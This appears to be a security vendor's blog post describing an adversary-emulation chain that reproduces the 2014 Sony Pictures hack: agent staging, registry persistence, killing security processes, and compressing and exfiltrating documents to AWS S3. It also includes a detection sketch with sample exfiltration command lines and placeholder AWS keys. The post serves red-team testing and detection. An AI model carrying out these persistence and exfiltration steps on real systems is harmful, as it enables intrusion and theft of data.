APT38 Sony Hack

This chain will stage PneumaEX in the System32 directory, edit the registry for persistence of PneumaEX, kill GOP-specific processes and services, compress and exfiltrate data to AWS S3, and open the GOP extortion image. To execute this chain in its entirety, you must run your agent as Administrator. To stay true to the Sony attack, we suggest using a Windows executable agent and communicating over HTTP.

TTP Tuesday: APT38 - The Sony Hack

The Guardians of Peace: Persistence, Exfiltration, and Extortion

Theme Overview

Before August of 2014 not many people were aware of a movie called The Interview, distributed by Sony Pictures, produced by Columbia Pictures (owned by Sony), and starring Seth Rogen and James Franco. The film depicts a talk show host and his producer who, knowing that North Korean leader Kim Jong-Un is a fan of their show, ask Kim for an interview. The CIA, knowing the two have been invited to North Korea, requests that they help assassinate Kim while there. The duo goes on a wild ride into North Korea, where they carry out their mission.

North Korea thought this movie was in poor taste, calling it “the movie of terrorism”; they were clearly not happy about an American film depicting the assassination of their current leader. In November of 2014 the “Guardians of Peace” hacked the computer networks of Sony Pictures and leaked emails, employee records, and even several unreleased films. The Guardians of Peace extorted Sony by threatening further releases of confidential company information if it went ahead and distributed the film, and even threatened attacks against theaters that would show it. This led to the cancellation of the theatrical release; the film was eventually released on Christmas Day (12/25/2014). This entire event would cause Sony to lose millions of dollars, not just from the cost of The Interview but from all of the other data that was released to the public.

Sony Hack Timeline

  • November 25, 2014 – First reports of the attack on the Sony network
  • November 28, 2014 – Tech news outlets report that North Korea is being investigated for the attack
  • November 29, 2014 – Copies of unreleased movies, believed to be rips of DVD screeners from Sony Pictures, appear on file sharing sites
  • December 1, 2014 – Documents released, revealing salaries of Sony Pictures executives
  • December 2, 2014 – Leaked documents reveal personal information of Sony employees (pay details, names, birth dates, social security information) and other internal Sony corporate documents to the public. The FBI also releases a warning about destructive malware called Destover.
  • December 3, 2014 – Reports claim that North Korea will be "officially named" as behind the attacks
  • December 5, 2014 – Threatening emails sent to Sony Pictures employees; the FBI confirms that it is investigating
  • December 6, 2014 – North Korea releases a statement calling the attack "righteous", but denies involvement
  • December 8, 2014 – Investigations reveal that the hackers used the high-speed network of a hotel in Bangkok, Thailand to leak confidential employee data to the Internet on December 2, 2014.
  • December 16, 2014 – Hackers send threats of additional attacks, with references to September 11, 2001, if the movie The Interview is released.
  • December 17, 2014 – US officials conclude that North Korea ordered the cyber-attacks on Sony Pictures' computers. Theater chains announce they will not show the film, and Sony cancels the movie's release.
  • December 19, 2014 – The FBI releases an official update on its investigation, concluding that the North Korean government was responsible for the attack.

APT38 Sony Chain

My main objective in building out this chain was to replicate at least some artifacts from the attack. The agent location and communication on the target machine are similar. The registry edits made on the target machine to provide agent persistence are exact and still work on fully updated Windows 10 machines. I have also included a TTP that kills processes that GOP would kill on the target. Many of these processes will not be applicable on most machines since they are related to Microsoft SQL, but they are interesting because they relate to the attackers tampering with the databases. I then took a different approach to the exfiltration of data, adding a new way to perform exfiltration that can be used outside this chain. It is cloud-based exfiltration, and I really like it because I believe it will be harder for the user to detect. Lastly, we open the GOP image in a web browser, which is the same method used during the attack. The Guardians of Peace claimed they stayed resident on target machines for months, pulling data when the opportunity arose. This chain will allow you to stay resident on target and exfiltrate data to a safe location.

Thanks for reading! We’ll be back next week with more examples of APT38 tradecraft!

Watch a demonstration: APT38 Sony Hack

Staying up to date

Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!

There are several ways to follow us and learn more about Prelude and our team members:

Get our products

Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg

Join our community

Discord: https://discord.gg/gzUv4XNquu
Reddit: https://www.reddit.com/r/preludeorg/
Twitter: https://twitter.com/preludeorg

Read, watch, and listen

Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg

Follow our team

David: privateducky
Alex: khyberspache
Kris: Xanthonus
Octavia: VVX7
Sam: wasupwithuman

Source: https://feed.prelude.org

  • Stage PneumaEX
  • Install PneumaEX registry persistence
  • Kill security processes
  • Compress and stage documents directory
  • Install AWS CLI and exfiltrate file to S3 bucket
  • Ingress GOP image and open in web browser
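From the defender's side, the steps above leave host artifacts that can be matched in endpoint telemetry: a Run-key value set outside a known baseline, an archive of the Documents folder, and an AWS CLI upload to S3 shortly afterwards. The sketch below is an added example written for this page, not Prelude's or the chain's own code; the Sysmon-style event shape, the Run-key allowlist, the one-hour correlation window, the `agent.exe` file name and all sample events are constructed assumptions.

```python
"""Detection sketch for this chain's host artifacts (added example; not Prelude's code)."""
import re
from dataclasses import dataclass

@dataclass
class Event:
    ts: int            # seconds since epoch (constructed)
    kind: str          # "proc" = process create, "reg" = registry value set
    image: str         # process created (proc) or process writing the value (reg)
    detail: str        # command line (proc) or value data (reg)
    target: str = ""   # registry value path (reg only)

# Assumed baseline of Run-key values already expected on this host.
RUN_ALLOWLIST = {r"C:\Windows\System32\SecurityHealthSystray.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
S3_UPLOAD = re.compile(r"\bs3(api)?\s+(cp|sync|mv|put-object)\b", re.I)
ARCHIVE = re.compile(r"(Compress-Archive|\b7z(\.exe)?\s+a\s|\btar(\.exe)?\s+-?c\w*\s).*\\Documents", re.I)
CORRELATION_WINDOW = 3600  # seconds allowed between archiving and upload (assumption)

SAMPLE = [  # constructed events mirroring the chain's steps; not real telemetry
    Event(101, "reg", r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\agent.exe",
          r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event(300, "proc", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"Compress-Archive -Path C:\Users\bob\Documents -DestinationPath C:\Users\bob\AppData\Local\Temp\docs.zip"),
    Event(420, "proc", r"C:\Program Files\Amazon\AWSCLIV2\aws.exe",
          r"aws s3 cp C:\Users\bob\AppData\Local\Temp\docs.zip s3://example-bucket/docs.zip --profile MyNewProfile"),
    Event(500, "reg", r"C:\Windows\explorer.exe", r"C:\Windows\System32\SecurityHealthSystray.exe",
          r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth"),
]

def detect(events):
    """Return (rule, ts, evidence) tuples in time order; an S3 upload that follows a
    Documents archive within the window is escalated to staged_exfil_to_s3."""
    alerts, archive_ts = [], None
    for e in sorted(events, key=lambda x: x.ts):
        if e.kind == "reg" and RUN_KEY.search(e.target) and e.detail not in RUN_ALLOWLIST:
            alerts.append(("run_key_persistence", e.ts, e.detail))
        elif e.kind == "proc":
            if ARCHIVE.search(e.detail):
                archive_ts = e.ts
                alerts.append(("documents_archived", e.ts, e.detail))
            if e.image.lower().endswith(("\\aws.exe", "/aws")) and S3_UPLOAD.search(e.detail):
                staged = archive_ts is not None and e.ts - archive_ts <= CORRELATION_WINDOW
                alerts.append(("staged_exfil_to_s3" if staged else "s3_upload", e.ts, e.detail))
    return alerts

if __name__ == "__main__":
    for rule, ts, evidence in detect(SAMPLE):
        print(f"[{ts}] {rule}: {evidence}")
```

The allowlisted SecurityHealth value produces no alert, so the baseline is what keeps the Run-key rule from paging on every legitimate autostart.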

User-Set Custom Variables

  • aws.accesskey: AKIA0123456787EXAMPLE
  • aws.password: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
  • aws.profile: MyNewProfile
  • aws.region: us-west-1
  • aws.s3.bucket: apt38-gop-stash